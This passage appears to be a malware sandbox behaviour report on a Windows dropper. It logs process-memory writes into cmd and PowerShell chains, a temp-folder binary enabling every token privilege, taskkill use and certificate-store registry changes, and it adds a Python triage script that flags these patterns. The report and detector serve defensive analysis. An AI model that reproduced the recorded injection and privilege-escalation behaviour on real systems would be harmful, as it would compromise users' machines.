Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133757331497987788" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\dwm.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeTrustedCredManAccessPrivilege (LUID 31, name not resolved by the sandbox) N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeRelabelPrivilege (LUID 32, name not resolved by the sandbox) N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeIncreaseWorkingSetPrivilege (LUID 33, name not resolved by the sandbox) N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeTimeZonePrivilege (LUID 34, name not resolved by the sandbox) N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeCreateSymbolicLinkPrivilege (LUID 35, name not resolved by the sandbox) N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19411ac950924ec3f.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c78ded4d176ac.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
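Read as a whole, the AdjustPrivilegeToken table separates into three very different things. Tue19b4ef3b53293fe.exe requests every privilege from LUID 2 (SeCreateTokenPrivilege) through LUID 35 in numeric order, which is the footprint of code that walks the whole privilege range and enables whatever the token holds rather than asking for the one right it needs; the log records the request, not whether each one was granted. taskkill.exe and powershell.exe enabling SeDebugPrivilege is expected (taskkill /f needs it to terminate other users' processes), and chrome.exe toggling SeShutdownPrivilege and SeCreatePagefilePrivilege is ordinary browser start-up. SeDebugPrivilege requested by a binary running out of %TEMP% (Tue19411ac950924ec3f.exe, Tue19c78ded4d176ac.exe) is the row worth a second look. The following is an added triage helper, not part of the report or the sandbox: it parses rows in the table's own "Token: X N/A <process> N/A" layout, resolves bare LUIDs to their winnt.h names (the sandbox prints SeProfSingleProcessPrivilege and SeIncBasePriorityPrivilege for LUIDs 13 and 14; those short spellings are mapped back), and attaches the three findings described above. The thresholds and the "high impact" set are this example's assumptions.

```python
import re
from collections import defaultdict

# LUID -> privilege name from the SE_*_PRIVILEGE constants in winnt.h. These values are fixed
# across Windows releases; the sandbox printed bare numbers for 31..35.
LUID_NAMES = {
    2: "SeCreateTokenPrivilege", 3: "SeAssignPrimaryTokenPrivilege", 4: "SeLockMemoryPrivilege",
    5: "SeIncreaseQuotaPrivilege", 6: "SeMachineAccountPrivilege", 7: "SeTcbPrivilege",
    8: "SeSecurityPrivilege", 9: "SeTakeOwnershipPrivilege", 10: "SeLoadDriverPrivilege",
    11: "SeSystemProfilePrivilege", 12: "SeSystemtimePrivilege", 13: "SeProfileSingleProcessPrivilege",
    14: "SeIncreaseBasePriorityPrivilege", 15: "SeCreatePagefilePrivilege", 16: "SeCreatePermanentPrivilege",
    17: "SeBackupPrivilege", 18: "SeRestorePrivilege", 19: "SeShutdownPrivilege",
    20: "SeDebugPrivilege", 21: "SeAuditPrivilege", 22: "SeSystemEnvironmentPrivilege",
    23: "SeChangeNotifyPrivilege", 24: "SeRemoteShutdownPrivilege", 25: "SeUndockPrivilege",
    26: "SeSyncAgentPrivilege", 27: "SeEnableDelegationPrivilege", 28: "SeManageVolumePrivilege",
    29: "SeImpersonatePrivilege", 30: "SeCreateGlobalPrivilege", 31: "SeTrustedCredManAccessPrivilege",
    32: "SeRelabelPrivilege", 33: "SeIncreaseWorkingSetPrivilege", 34: "SeTimeZonePrivilege",
    35: "SeCreateSymbolicLinkPrivilege",
}
# Short spellings the sandbox uses for two of the names above.
ALIASES = {"SeProfSingleProcessPrivilege": 13, "SeIncBasePriorityPrivilege": 14}

# Assumption for this example: privileges a user-mode installer has no legitimate reason to enable.
HIGH_IMPACT = {"SeTcbPrivilege", "SeCreateTokenPrivilege", "SeAssignPrimaryTokenPrivilege",
               "SeLoadDriverPrivilege", "SeTrustedCredManAccessPrivilege", "SeRelabelPrivilege"}
# Built-in tools for which SeDebugPrivilege is routine (taskkill /f, PowerShell host start-up).
DEBUG_PRIV_IS_NORMAL = ("\\taskkill.exe", "\\powershell.exe")
BLANKET_THRESHOLD = 20  # assumption: this many distinct privileges from one process = enable-all loop

ROW = re.compile(r"^Token:\s+(\S+)\s+N/A\s+(.+?)\s+N/A$")


def resolve(token: str) -> str:
    """Map a report token (a name, a bare LUID, or a sandbox short name) to the winnt.h name."""
    if token.isdigit():
        return LUID_NAMES.get(int(token), f"LUID-{token}")
    return LUID_NAMES[ALIASES[token]] if token in ALIASES else token


def parse_rows(rows):
    """Yield (process, privilege) pairs from 'Token: X N/A <process> N/A' report rows."""
    for row in rows:
        m = ROW.match(row.strip())
        if m:
            yield m.group(2), resolve(m.group(1))


def triage(rows) -> dict:
    """Group requested privileges per process and attach triage findings."""
    per_proc = defaultdict(set)
    for proc, priv in parse_rows(rows):
        per_proc[proc].add(priv)
    report = {}
    for proc, privs in per_proc.items():
        findings = []
        if len(privs) >= BLANKET_THRESHOLD:
            findings.append("blanket_privilege_enable")
        if privs & HIGH_IMPACT:
            findings.append("high_impact_privileges")
        low = proc.lower()
        if ("SeDebugPrivilege" in privs and not low.endswith(DEBUG_PRIV_IS_NORMAL)
                and "\\appdata\\local\\temp\\" in low):
            findings.append("debug_privilege_from_temp_binary")
        report[proc] = {"count": len(privs), "privileges": sorted(privs), "findings": findings}
    return report


# Rows reconstructed from the table above: Tue19b4ef... asked for LUIDs 2..35 in order (the
# sandbox named 2..30 and printed 31..35 as numbers), plus one row each for the other processes.
TUE = r"C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe"
REPORT_SPELLING = {13: "SeProfSingleProcessPrivilege", 14: "SeIncBasePriorityPrivilege"}
SAMPLE_ROWS = (
    [f"Token: {REPORT_SPELLING.get(i, LUID_NAMES[i])} N/A {TUE} N/A" for i in range(2, 31)]
    + [f"Token: {i} N/A {TUE} N/A" for i in range(31, 36)]
    + [
        r"Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A",
        r"Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19411ac950924ec3f.exe N/A",
        r"Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A",
        r"Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A",
        r"Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A",
    ]
)

if __name__ == "__main__":
    for proc, info in triage(SAMPLE_ROWS).items():
        print(f"{info['count']:>3} {info['findings']} {proc}")
```

The finding names are deliberately coarse; the point is that a process-level roll-up of this table is far more readable than the raw rows, and that a per-process count of distinct privileges is a stable detection feature even when the loader binary name changes from run to run.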

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3984 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe
PID 3984 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe
PID 3984 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe
PID 3228 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1940 wrote to memory of 3868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1940 wrote to memory of 3868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1940 wrote to memory of 3868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4012 wrote to memory of 1900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4012 wrote to memory of 1900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4012 wrote to memory of 1900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3228 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 4164 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 4164 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 4164 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 3220 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 3220 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 3220 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 3936 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
